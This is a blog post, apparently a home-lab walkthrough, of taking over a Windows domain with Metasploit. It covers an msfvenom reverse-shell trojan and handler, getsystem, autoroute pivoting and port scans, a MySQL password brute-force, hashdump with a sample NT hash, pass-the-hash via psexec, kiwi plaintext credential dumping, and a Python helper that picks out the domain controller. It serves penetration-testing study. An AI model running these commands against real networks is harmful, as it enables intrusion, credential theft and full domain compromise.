Simple domain penetration

Reference (the expert's article):

Intranet penetration - complete domain penetration

Some basic knowledge


A computer domain is a collection of computers that share a security boundary. Computers in the same domain trust each other: authentication is handled centrally, so a domain account that has been authenticated by the domain controller can access other machines in the domain without needing a separate account on each of them.

Domain controller:

In "domain" mode, at least one server is responsible for authenticating every computer and user that connects to the network. It is the equivalent of the gatekeeper of an organization and is called the Domain Controller (abbreviated DC).

Active Directory:

Active Directory is the directory service for Windows Standard Server, Windows Enterprise Server and Windows Datacenter Server. (Active Directory cannot run on Windows Web Server, but it can manage computers running Windows Web Server.) Active Directory stores information about network objects and makes it easy for administrators and users to find and use this information. It uses a structured data store as the basis for a logical, hierarchical organization of directory information.

The Microsoft Active Directory service is a core component of the Windows platform. It gives administrators a powerful means of managing the identities of, and the relationships between, the various components of the network environment.

Domain and domain objects:

A domain is the logical organizational unit for network objects. In a Windows network operating system environment it is the logical organizational unit of the intranet and the core unit of the network's logical organization. These objects include users, groups, and computers. All objects in the domain are stored in Active Directory, which can reside on one or more domain controllers of the domain. When a domain establishes a trust relationship with other domains, the two domains can not only manage each other as needed but also share equipment resources such as files and printers across the network, so that network resources can be shared and managed between different domains.

Establish domain environment

For environment establishment, please refer to

Domain penetration

Knowledge points: Trojan generation & getting a session in MSF

From the figure above, we can see that there are three hosts in this domain. The domain controller and win2003 have no extra network card, so they cannot reach the external network through the card they have. The domain member host win2008, however, has two network cards, one of which can communicate with the external network, and our Kali can reach it.

First we generate a Trojan file on Kali, then upload it through the shell we already have on win2008 and execute it, and we can catch the connection in msfconsole.

Kali generates the Trojan (as root; LHOST is Kali's address as reachable from win2008):


msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=12345 -f exe > /root/shell.exe

Kali listens on its port 12345 (lhost must be the same address used for LHOST above):


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 12345
run

Execute the Trojan on the domain member host win2008; the Meterpreter session comes back to msf successfully.

Knowledge point: simple privilege escalation

Try a simple privilege escalation:

meterpreter > getprivs
  Enable all privileges available to the current token
meterpreter > getsystem
  Try the built-in techniques (named-pipe impersonation, token duplication) to obtain SYSTEM

After running getsystem, the privilege escalation succeeds (getuid should now report NT AUTHORITY\SYSTEM).

Knowledge points: information gathering & host detection

Information gathering:
meterpreter > shell
chcp 65001         (switch the console to UTF-8 to avoid garbled characters; sometimes useful, not applicable to every situation)
ipconfig /all      Query the host's network card details (addresses, DNS suffix and DNS servers)
net time /domain   View the primary domain of the current host (the reply names the domain controller that answered)
tasklist           Query the process list
systeminfo         View the patch (hotfix) list, along with the OS version and architecture
exit               (Exit the current shell and return to meterpreter)

Add the subnets of the controlled host's network cards to Metasploit's routing table (the module also lists the host's interfaces and the routes it added):

run post/multi/manage/autoroute

Detect other hosts in the intranet of the controlled host

You can ping from the controlled host to detect whether other hosts exist:

meterpreter > run post/multi/gather/ping_sweep RHOSTS=

Combined with the above, the DNS server address obtained by executing ipconfig /all on win2008 points to one intranet host. Because the DNS role normally runs on the domain controller in an AD domain, it can be basically determined that this host is the domain controller.

And the domain is chujhss.com.
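To make the two inferences above concrete (reading the DNS server out of ipconfig /all to guess the domain controller, and turning each adapter's address and mask into the subnet that later goes into a Metasploit route add), here is an added example, written for this page and not code from the original post. It parses ipconfig /all output as the English code page prints it. The sample output, adapter names and addresses (10.10.10.0/24 as the intranet side, 192.0.2.0/24 as the Kali-facing side) are constructed for the example; only the DNS suffix chujhss.com comes from the post.

```python
import ipaddress
import re

# Constructed "ipconfig /all" output (English, as after chcp 65001) for a dual-homed host
# like win2008. Adapter names and addresses are made up for this example; only the DNS
# suffix chujhss.com is taken from the post.
SAMPLE_IPCONFIG = """
Windows IP Configuration

   Host Name . . . . . . . . . . . . : WIN2008
   Primary Dns Suffix  . . . . . . . : chujhss.com
   Node Type . . . . . . . . . . . . : Hybrid

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : chujhss.com
   Physical Address. . . . . . . . . : 00-0C-29-AA-BB-01
   IPv4 Address. . . . . . . . . . . : 10.10.10.20(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.1
   DNS Servers . . . . . . . . . . . : 10.10.10.10

Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   Physical Address. . . . . . . . . : 00-0C-29-AA-BB-02
   IPv4 Address. . . . . . . . . . . : 192.0.2.20(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.0.2.1
   DNS Servers . . . . . . . . . . . : 192.0.2.53
                                       192.0.2.54
"""

# "Key . . . . : value" lines; the key stops at the first dot or colon, the dotted filler
# is skipped, and the value (possibly empty, possibly containing ':' for IPv6) follows.
FIELD_RE = re.compile(r"^\s+([A-Za-z][^.:]*?)[ .]*:\s*(.*)$")


def parse_ipconfig(text):
    """Return {adapter: {field: [values]}}; the pre-adapter header goes under '__global__'."""
    adapters = {"__global__": {}}
    current, last_field = "__global__", None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():                  # "Ethernet adapter X:" header lines
            if raw.rstrip().endswith(":"):
                current = raw.strip()[:-1]
                adapters[current] = {}
            last_field = None
            continue
        m = FIELD_RE.match(raw)
        if m:
            last_field = m.group(1).strip()
            values = adapters[current].setdefault(last_field, [])
            if m.group(2).strip():
                values.append(m.group(2).strip())
        elif last_field:                          # continuation line, e.g. a second DNS server
            adapters[current][last_field].append(raw.strip())
    return adapters


def ipv4_networks(adapters):
    """adapter -> IPv4Network from its address and mask (the candidates for 'route add')."""
    nets = {}
    for name, fields in adapters.items():
        for addr, mask in zip(fields.get("IPv4 Address", []), fields.get("Subnet Mask", [])):
            addr = addr.split("(")[0]             # strip "(Preferred)"
            nets[name] = ipaddress.IPv4Interface(f"{addr}/{mask}").network
    return nets


def dc_candidates(adapters, domain):
    """DNS servers on adapters whose DNS suffix is the target domain. In an AD domain the
    DNS role normally runs on the DC, so these addresses are the first DC guesses."""
    found = []
    for fields in adapters.values():
        suffixes = [s.lower() for s in fields.get("Connection-specific DNS Suffix", [])]
        if domain.lower() in suffixes:
            found.extend(fields.get("DNS Servers", []))
    return found


def route_commands(nets, session_id, skip=()):
    """msfconsole 'route add <subnet> <netmask> <session>' for every adapter network,
    skipping networks the attacker already reaches directly (the one Kali sits on)."""
    skip_nets = {ipaddress.ip_network(s) for s in skip}
    return [f"route add {n.network_address} {n.netmask} {session_id}"
            for _, n in sorted(nets.items()) if n not in skip_nets]


if __name__ == "__main__":
    ad = parse_ipconfig(SAMPLE_IPCONFIG)
    nets = ipv4_networks(ad)
    print("DC candidates:", dc_candidates(ad, "chujhss.com"))
    for cmd in route_commands(nets, 1, skip=["192.0.2.0/24"]):
        print(cmd)
```

The DC guess is only a heuristic (confirm it with net time /domain or an LDAP/Kerberos port check), and the skip list exists because adding the subnet Kali already sits on to the Metasploit routing table would needlessly send that traffic through the session.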

Knowledge points: setting routes

After that, we can add a route to our msfconsole (add the subnet behind the intranet network card of the domain member win2008 so that Metasploit modules can reach it through the session):

meterpreter > background
msf6 post(multi/manage/autoroute) > route add 1
  Add this subnet (via session 1) to msfconsole's routing table so that msf can reach the other intranet hosts. If autoroute above already added it, this step is redundant (check with route print). The route is used only by Metasploit modules; other Kali tools would additionally need a socks proxy (auxiliary/server/socks_proxy) on top of it
msf6 post(multi/manage/autoroute) > use scanner/portscan/tcp
  Port-scan with this module
msf6 auxiliary(scanner/portscan/tcp) > set rhosts,
  Set the IPs to scan and check which ports are open on them
msf6 auxiliary(scanner/portscan/tcp) > run

Database login module attempt (incomplete, failed)

It is found that the host at IP  has ports 3389 and 3306 open; the two ports correspond to Remote Desktop and the MySQL database respectively.

You can try a MySQL weak-password login first:

use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts
msf6 auxiliary(scanner/mysql/mysql_login) > set username root
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file top500.txt
msf6 auxiliary(scanner/mysql/mysql_login) > run

But I didn't get this experiment to work (remote connections to the database were enabled and the database password was 123456, but it could never connect).

Because the database login could not connect, privilege escalation on win2003 through the database was not successful.

But looking back, we already have SYSTEM privileges on the domain member win2008, so we can use a pass-the-hash attack, or use the kiwi extension to obtain plaintext passwords directly from that host.

Pass-the-hash attack

Migrate the Trojan process

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

This message means we need to migrate the process. Move the backdoor into a process that the system runs; the usual choice here is explorer.exe. (This error typically appears when the Meterpreter's architecture does not match the host, e.g. a 32-bit payload on 64-bit Windows; migrating into a process with the host's native architecture fixes it. hashdump still needs SYSTEM, so run getsystem again if the process you migrated into runs as a normal user.)

Find the PID of explorer.exe with ps, then migrate our backdoor into it:

meterpreter > migrate 2740
meterpreter > hashdump

After successfully obtaining the administrator's password hash, we can use it for lateral movement. The value is LM:NT; the first half (aad3b435b51404eeaad3b435b51404ee) is the fixed value of an empty/disabled LM hash, and the second half is the NT hash, which is what pass-the-hash actually uses.

Pass-the-hash attack

meterpreter > background
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
  bind_tcp is used because win2003 has no route back to Kali; msf connects to it through the route added above
set rhost
set SMBPass aad3b435b51404eeaad3b435b51404ee:f0d9e79641bfd8fb6d7b01fa4fb3d606
set SMBUser administrator
exploit

Compromise the domain member win2003

The session is obtained successfully, and the privilege level is SYSTEM.

The final task is to take down the domain controller host.

Using kiwi

The mimikatz extension used in the past has been replaced by kiwi; we use it now to obtain the plaintext password on win2008. (Plaintext recovery relies on WDigest caching credentials in LSASS, which is on by default on Windows Server 2003/2008; on Windows 8.1/Server 2012 R2 and later, or on older systems where UseLogonCredential has been set to 0 after KB2871997, creds_all usually returns only hashes.)

For detailed kiwi usage, please refer to the expert's article.

meterpreter > load kiwi      Load the kiwi extension
meterpreter > creds_all      Dump all credentials (including plaintext passwords) from this machine

Take down the domain control host

This is the plaintext password (sorry, I have pixelated it, haha)


use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set RHOST
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBDomain chujhss
msf6 exploit(windows/smb/psexec) > set SMBPass 123456   (the plaintext password obtained above)
msf6 exploit(windows/smb/psexec) > exploit

Finally, we obtain a session on the domain controller (with SMBDomain set, psexec authenticates the account against the domain rather than the local SAM).

In this experiment I didn't solve the problem with the database login module. It's a somewhat old-fashioned walkthrough, but overall it was still very helpful for me. I hope everyone's intranet study goes smoothly!

Supplementary knowledge: other modules for obtaining passwords

Grab auto-logon credentials (stored under the Winlogon registry key when automatic login is configured):

run windows/gather/credentials/windows_autologin

An alternative hash dumper that chooses its method according to the privileges available; useful when hashdump fails:

run windows/gather/smart_hashdump

Keywords: security Web Security

Added by jkohns on Sat, 12 Feb 2022 07:32:03 +0200